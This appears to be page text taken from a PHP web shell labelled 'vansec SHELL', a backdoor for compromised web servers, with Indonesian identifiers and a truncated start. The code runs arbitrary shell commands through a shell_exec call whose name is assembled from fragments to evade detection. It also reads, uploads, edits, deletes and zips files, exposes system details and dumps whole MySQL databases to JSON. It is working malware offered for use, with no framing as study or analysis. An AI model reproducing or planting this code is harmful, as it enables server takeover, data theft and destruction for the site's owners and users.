".htmlspecialchars(empty($bagikan)&&$ii!=count($parse)?'/':$bagikan).""; } $sonDir = implode("/", $sonDir); print $sonDir . '      ( Reset | Go to )'; } function sizeFormat($bytes) { if($bytes>=1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' Gb'; } else if($bytes>=1048576) { $bytes = number_format($bytes / 1048576, 2) . ' Mb'; } else if($bytes>=1024) { $bytes = number_format($bytes / 1024, 2) . ' Kb'; } else { $bytes = $bytes . ' b'; } return $bytes; } function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else if (is_string ($d)) { return utf8_encode($d); } return $d; } function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "." && $object != "..") { if (is_dir($dir . "/" . $object)) { rrmdir($dir . "/" . $object); } else { unlink($dir . "/" . $object ); } } } rmdir( $dir ); } } $default_dir = getcwd(); if(isset($_POST['berkas']) && is_string($_POST['berkas']) ) { $default_dir = empty($_POST['berkas']) ? DIRECTORY_SEPARATOR : uraikan(urldecode(urldecode($_POST['berkas']))); $c_h_dir_comm = 'c'.'hd'.'ir'; $c_h_dir_comm($default_dir); } $default_dir = str_replace("\\", "/", $default_dir); if(isset($_GET['awal']) && $_GET['awal']=="pinf") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("body {background-color: #ffffff; color: #000000;}","",$pInf); exit(); } else if($awal=="download_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { header("Content-Disposition: attachment; filename=".basename($namaBerkas)); header("Content-Type: application/octet-stream"); header('Content-Length: ' . filesize($default_dir . $pemisah . $namaBerkas)); readfile($default_dir . $pemisah . $namaBerkas); exit(); } } else if($awal=="hapus_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { unlink($default_dir . $pemisah . $namaBerkas); } } else if($awal=="reset_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else if($awal=="buat_file" && isset($_POST['ad']) && !empty($_POST['ad'])) { $namaBerkas = basename(urldecode($_POST['ad'])); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if( is_file($default_dir . $pemisah . $namaBerkas) ) { print ''; } else { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else if($awal=="buat_folder" && isset($_POST['ad']) && !empty($_POST['ad'])) { $namaFolder = basename(urldecode($_POST['ad'])); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaFolder,0,1)!="/" ? "/" : ""; if( is_file($default_dir . $pemisah . $namaFolder) ) { print ''; } else { mkdir($default_dir . $pemisah . $namaFolder); } } else if($awal=="rename_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl'])) && isset($_POST['new_name']) && is_string($_POST['new_name']) && !empty($_POST['new_name'])) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $fileNamaBaru = basename(urldecode($_POST['new_name'])); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { rename($default_dir . $pemisah . $namaBerkas , $default_dir . $pemisah . $fileNamaBaru); } } else if( $awal == 'skl_d_t' && isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t']) ) { $tableName = uraikan(urldecode($_POST['t'])); $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; if( !empty( $host ) && !empty($database) ) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $databaseStr , $user , $sandi,array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database , $tableName)); $columns = $getColumns->fetchAll(); if( $columns ) { $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); header('Content-disposition: attachment; filename=d_' . basename(htmlspecialchars($tableName)) . '.json'); header('Content-type: application/json'); echo json_encode($data); } else { print 'Table not found!'; } } catch (Exception $e) { print $e->getMessage(); } } else { print 'Error! Please connect to SQL!'; } die; } else if( $awal == 'skl_d' ) { $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; if( !empty( $host ) && !empty($database) ) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $databaseStr , $user , $sandi,array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tables->execute(array($database)); $tables = $tables->fetchAll(); foreach( $tables AS $tableName ) { $tableName = $tableName['table_name']; $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header('Content-disposition: attachment; filename=d_b_' . basename(htmlspecialchars($database)) . '.json'); header('Content-type: application/json'); echo json_encode( utf8ize( $allData) ); } catch (Exception $e) { print $e->getMessage(); } } else { print 'Error! Please connect to SQL!'; } die; } else if( $awal == 'kompres' && isset($_POST['save_to'] , $_POST['zf']) && is_string($_POST['save_to']) && !empty($_POST['save_to']) && !in_array($_POST['save_to'] , array('.' , '..' , './' , '../')) && is_string($_POST['zf']) && !empty($_POST['zf']) ) { $save_to = uraikan(urldecode($_POST['save_to'])); $rootPath = realpath(uraikan(urldecode($_POST['zf']))); $fileName1 = 'bak_'.microtime(1) . '_' . rand(1000, 99999) . '.zip'; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if( is_dir( $save_to ) && is_dir( $rootPath ) && is_writable( $save_to ) ) { set_time_limit(0); $zip = new ZipArchive(); $zip->open( $fileName , ZipArchive::CREATE | ZipArchive::OVERWRITE ); $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print 'Saved!
'; } else { print 'Dir is not writeable!
';var_dump(( $save_to ) ); } } else if( $awal == 'hapus_folder' && isset($_POST['zf']) && is_string($_POST['zf']) && !empty($_POST['zf']) ) { $rootPath = realpath(uraikan(urldecode($_POST['zf']))); if( is_dir( $rootPath ) ) { set_time_limit(0); rrmdir( $rootPath ); } else { print 'Dir is not writeable!
';var_dump(( $save_to ) ); } } if ($awal == 'upl_file' && isset($_FILES['ufile'])) { $tmp_name = $_FILES['ufile']['tmp_name']; $name = basename($_FILES['ufile']['name']); $upload_path = $default_dir . '/' . $name; if ($_FILES['ufile']['error'] !== UPLOAD_ERR_OK) { $upload_message = "Error pada upload: " . $_FILES['ufile']['error']; } elseif (!is_uploaded_file($tmp_name)) { $upload_message = "File tidak diterima sebagai unggahan yang sah."; } else { $real_size = filesize($tmp_name); if ($real_size <= 0) { $upload_message = "File tidak boleh kosong atau rusak."; } else { if (move_uploaded_file($tmp_name, $upload_path)) { $url = htmlspecialchars($name); $upload_message = "Upload sukses: $url"; } else { $upload_message = "Gagal memindahkan file."; } } } } ?> vansec SHELL Uname: " . php_uname() . "
"; print "User: ".getmyuid()." (".get_current_user().")
"; print "Group: ".getmygid()." (".$qrup.")
"; } else { print "Uname: " . php_uname() . "
"; print "User: ".getmyuid()." (".get_current_user().")
"; print "Group: ".getmygid()."
"; } print "Disable functions: " . (implode(", ", $nami)==""?"NONE ":"". implode(", ", $nami)) . "
"; print "Safe mode: " . ($safeMode===true?"On":"Off") . "[ PHPinfo ]
"; tulisLah(); print '
'; if($awal=="phpinfo") { print "
"; } else if($awal=="sistem_kom") { if( isset( $_POST['kom'] ) && is_string($_POST['kom']) && !empty($_POST['kom']) ) { $komanda = uraikan(urldecode($_POST['kom'])); $k = 'sh'; $k.='el'; $k.='l_e'; $k.='xe'; $k.='c'; $output = $k($komanda); print '
' . htmlspecialchars($output) . '
'; } print ' '; } else if($awal=="baca_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? " onclick='halaman(\"?awal=edit_file&fayl=".urlencode(urlencode(kunci($namaBerkas)))."&berkas=".urlencode(urlencode(kunci($default_dir)))."\")'" : " disabled"; print "
Nama File: ".htmlspecialchars($namaBerkas)."
"; print "
".highlight_string(file_get_contents($default_dir . $pemisah . $namaBerkas), true)."
"; } } else if($awal == 'skl') { $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; if( isset($_POST['host'] , $_POST['user'] , $_POST['sandi']) && is_string($_POST['host']) && is_string($_POST['user']) && is_string($_POST['sandi']) ) { $host = $_POST['host']; $user = $_POST['user']; $sandi = $_POST['sandi']; $database = ''; setcookie('host' , $host , time() + 360000); setcookie('user' , $user , time() + 360000); setcookie('sandi' , $sandi , time() + 360000); setcookie('database' , $database , time() + 360000); } if( isset($_POST['database']) && is_string($_POST['database']) ) { $database = $_POST['database']; setcookie('database' , $database , time() + 360000); } $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; ?>
"SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query('SELECT schema_name FROM information_schema.schemata'); print '
'; if( !empty($database) ) { $tables = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tables->execute(array($database)); $tables = $tables->fetchAll(); print '
'; print '!! Dump DB !!
'; foreach( $tables AS $tableName ) { $tableName = $tableName['table_name']; print ''.htmlspecialchars($tableName).'
'; } print '
'; print '
'; if( isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t']) ) { $tableName = uraikan(urldecode($_POST['t'])); print 'Table: ' . htmlspecialchars($tableName) . ' ( Dump )
'; $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database , $tableName)); $columns = $getColumns->fetchAll(); if( $columns ) { $dataCount = $pdo->query('SELECT count(0) AS ss from `' . $tableName . '`'); $dataCount = (int)$dataCount->fetchColumn(); print 'Count: ' . $dataCount . '

'; $pages = ceil($dataCount / 100); $currentPage = isset($_POST['halaman']) && is_numeric($_POST['halaman']) && $_POST['halaman'] >= 1 && $_POST['halaman'] <= $pages ? (int)$_POST['halaman'] : 1; for ( $p = 1; $p <= $pages; $p++ ) { print '' . $p . ' '; } print '

'; $start = 100 * ($currentPage - 1); $data = $pdo->query('SELECT * FROM `' . $tableName .'` LIMIT '.$start.' , 100'); $data = $data->fetchAll(); print ''; foreach( $columns AS $columnInf ) { print ''; } print ''; foreach( $data AS $row ) { print ''; foreach( $row AS $key=>$val ) { print ''; } print ''; } print '
' . htmlspecialchars($columnInf['column_name']) . '
' . $val . '
'; } else { print 'Table not found!'; } } else if ( isset($_POST['emr']) && is_string($_POST['emr']) && !empty($_POST['emr']) ) { $emr = uraikan(urldecode($_POST['emr'])); print 'SQL emr: ' . htmlspecialchars($emr) . '
'; $data = $pdo->query( $emr ); $data = $data->fetchAll(); print ''; if( count($data) > 0 ) { print ''; foreach( $data[0] AS $key=>$val ) { print ''; } print ''; } print ''; foreach( $data AS $row ) { print ''; foreach( $row AS $key=>$val ) { print ''; } print ''; } print '
' . $key . '
' . $val . '
'; } print '
'; print '
'; print '
'; } } catch (Exception $e) { print $e->getMessage(); } } } else if($awal=="edit_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode(urldecode($_POST['fayl'])))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $status = ""; if(isset($_POST['content']) && isset($_POST['took']) && $_POST['took']!="" && isset($_SESSION['ys_took']) && $_SESSION['ys_took']==$_POST['took'] && is_writeable($default_dir . $pemisah . $namaBerkas)) { unset($_SESSION['ys_took']); $content = $_POST['content']; $cc = array('a','i','e','s','l','b','u','o','p','h',"(",")","<",">","?",";","[","]","$"); foreach($cc AS $k1=>$v1) { $content = str_replace('|:'.$k1.':|' , $v1 , $content); } $faylAch = fopen($default_dir . $pemisah . $namaBerkas, "w+"); fwrite($faylAch, $content); fclose($faylAch); $status = " Berhasil disimpan!"; } $oxuUrl = "?awal=baca_file&fayl=".urlencode(urlencode(kunci($namaBerkas)))."&berkas=".urlencode(urlencode(kunci($default_dir))); $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? "" : " disabled"; print "
Nama File: ".htmlspecialchars($namaBerkas)."
$status
"; print ""; } else { print 'Error! ' . htmlspecialchars($default_dir . $pemisah . $namaBerkas); } } else { if(is_dir($default_dir)) { if(is_readable($default_dir)) { $folderDalam = scandir($default_dir); foreach($folderDalam AS &$emelemnt) { $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($emelemnt,0,1)!="/" ? "/" : ""; if(is_dir($default_dir . $pemisah . $emelemnt)) { $emelemnt = "0".$emelemnt; } else { $emelemnt = "1".$emelemnt; } } asort($folderDalam); print ""; foreach($folderDalam AS $element) { $url = ""; $element = substr($element,1); $fileNamaLengkap = $default_dir . $pemisah . $element; $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($element,0,1)!="/" ? "/" : ""; $adi = is_dir($fileNamaLengkap) ? "[ $element ]" : $element; $classN = ""; if(is_dir($fileNamaLengkap)) { if($element==".") { $url = "?berkas=".urlencode(urlencode(kunci($default_dir))); } else if($element=="..") { $yeniUrl = explode("/",$default_dir); foreach(array_reverse($yeniUrl) AS $j=>$qq) { if(trim($qq)!="") { unset($yeniUrl[count($yeniUrl)-$j-1]); break; } } $url = "?berkas=".urlencode(urlencode(kunci(implode("/",$yeniUrl)))); } else { $url = "?berkas=".urlencode(urlencode(kunci($fileNamaLengkap))); } $classN = " style='font-weight: 600;'"; } else { $url = "?awal=baca_file&fayl=".urlencode(urlencode(kunci($element)))."&berkas=".urlencode(urlencode(kunci($default_dir))); } $fayldi = is_file($fileNamaLengkap); $isReadableColor = is_readable( $fileNamaLengkap ) && is_writeable( $fileNamaLengkap ); print '' . substr(sprintf('%o', fileperms(( $fileNamaLengkap ))), -4) . ' '; } } else { print "
Permissions denided!
"; } } } print "
sFileSizeTanggalOwner/GroupPermissionsActions
'.htmlspecialchars($adi).' ' . ($fayldi?sizeFormat(filesize($fileNamaLengkap)):'') . ' ' . (date('d M Y, H:i' , filectime($fileNamaLengkap))) . ' ' . htmlspecialchars(fileowner($fileNamaLengkap)) . ' '; if( is_file($fileNamaLengkap) ) { print (' Download | ') . (' Rename | ') . (' Kosong | ') . (' Delete'); } else if( $adi != '[ . ]' && $adi != '[ .. ]' ) { print (' Zip | ') . (' Hapus'); } print '
"; ?>
-
File Baru | Folder Baru
Command
SQL